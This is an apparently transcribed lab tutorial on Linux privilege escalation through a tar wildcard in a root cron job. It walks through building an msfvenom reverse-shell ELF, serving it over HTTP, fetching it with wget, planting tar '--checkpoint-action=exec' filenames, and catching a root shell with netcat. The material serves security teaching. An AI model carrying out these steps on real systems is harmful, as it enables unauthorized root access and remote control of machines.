So in the last part of that cron jobs, after that file permissions, that path environment variables, we're gonna discuss about that wildcards. So as we shown in that etc cron tab, there are two files. The first one is that override.sh and second one is that compress.sh. So let's check what is it in compress.sh. So cat user local bin and then compress.sh. So here we can see that cd home users and then that tar that function or tar it's using that czf temporary in that backup.tar.cz and there's an asterisk that means a wildcard. That's mean we can run anything in that tar. Now there's an some important website also, so you can run up or like learn about that privilege escalation or that exploitation. So gtfo bins is like for the unix binaries that can be used by bypass local security restrictions in misconfigured system. So there are multiple that binary and that multiple that functions where we can see the actual code we have to run. So here I'm just searching for the tar, and in tar when I click on the tar function, so there are some that options for the shell, file upload, file download, file write, but we are talking about that only for the shell. And the first one we can see the tar cf dev null and then a file that checkpoint 1 and checkpoint equal to execute that bin as such. That's mean there is an like command line option that let you run other commands as a part of a checkpoint feature. So for execution this one we have to create a file that one that elf. So generally that elf it's for that execution and linkable file. So it's a like most platform. So let me that on the new tab, and with the help of msf venom. So we not discuss about that meta exploits of msf venom, but msf venom it's creating that payload, and we can that add that our loopback ip or that local host ip, the local port. So we can use that netcat to getting that exactly that reverse connection. So in msf venom hyphen p for the payload, and we have to create for that linux and s64, then shell reverse and then tcp. Now we have to assign that our local host ip, sorry uh, that our local ip which is that 10.17.436. That's mean for creating that reverse shell. So l host equal to that 10.17.4.36, and then L port we can assume anything, let's say 4444 as we assumed in our last video as well. And hyphen f we have to create that elf extension, and the file output it's let's say shell.elf, and then enter. Then that msf enum create that shell.elf, and we have to send this shell.elf file into this ssh that part. So we have to create a server. So that python hyphen m http dot server. So it's created that 0.0.0, that's mean this IP, and then port number 8000 and slash shell.elf. So here I just check that's present working directory. Okay, so now with the help of wget, that's http colon slash slash rip 10.17.4.36 port number 8000, and our file is shell.elf. Enter, it's connected, and we can see that we have that shell.elf file. Now we have to change into that executable. So for executable we have to add that chmod plus x and then home user and then shell.elf. Now we can see there's a shell.elf which is executable. Now we can execute this file, but before execution we have checked in the gtfo bins file. So there's are some like checkpoint and some that checkpoint hyphen action which execute that any file. So we have to execute that shell.elf. And in last video we see that about that path environment variable which is default for that our home and user, which we have already that connected. So let me that create that file. So touch home user and then hyphen hyphen checkpoint equal to 1, and the second one is home user and then checkpoint hyphen action equal to execute equal to. And in GTFO wins we see that there is some bin.sh, but we can change that bin.sh into that r shell.elf. So shell.elf and enter. So now we can see that we have two files, that checkpoint.1 and action equal to shell.elf. Now we can create that hyphen s and lv and then 444. So it's on listen mode. And now we have to wait that for execution of that for that path environment with the help of that wildcard of that tar. So when the tar command is that cron job runs, the wildcard will expand to include these files, and since their files name are valid, tar command line option and tar will recognize them as such as and treat them as command line option rather than the file names. So we can see that invert host name. So let's check it, is it working or not. So let me check that ls. So yes, like it is working. And for that root accessibility I can check with that who am I. So who am I, it's that root. That's mean you just escalate that privileges from normal user to the root user.